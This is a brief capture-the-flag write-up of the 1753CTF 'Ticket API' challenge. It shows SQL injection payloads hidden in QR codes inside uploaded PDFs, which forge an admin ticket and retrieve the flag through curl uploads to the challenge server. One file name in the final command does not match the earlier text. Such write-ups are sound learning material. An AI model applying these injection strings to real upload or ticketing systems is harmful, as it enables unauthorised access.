1753CTF
Ticket API
The challenge was a C# web app for submitting PDFs with QR codes containing a ticket UID. The challenge was to take advantage of faulty logic to make the website recognize our ticket as the admin ticket. It was fun to exploit an injection vulnerability using QR codes inside PDF files!
Unfortunately I didn't have enough time to describe the challenge in detail but I shared this in the discord as a proposed solution.
Solution
I created a PDF with a QR code in it that encodes
%' and hash='admin-needs-no-hash
I named this one exploit.pdf. I uploaded it to the challenge program locally and noted down its hash. In my case it was d735db42e7bbd7043d1ddf07a3a003163f397745.
Then I created another PDF with a QR code, this one encoding
da9af4de-54f8-4185-bce3-a5095ca83646'
, 'd735db42e7bbd7043d1ddf07a3a003163f397745'); --
the first string is any random UUID so it passes the guid check, the second string is the hash of exploit.pdf I named this one inject.pdf
Then I ran:
$ curl -X POST -F "file=@./inject.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/upload
"Ticket added"
and I got the flag:
$ curl -X POST -F "file=@./extract.pdf" https://ticket-api-061f5e195e3d.1753ctf.com/verify
{"id":1,"code":"1753c{dizz_are_not_forged_if_they_have_the_same_hasshhh}","hash":"admin-needs-no-hash"}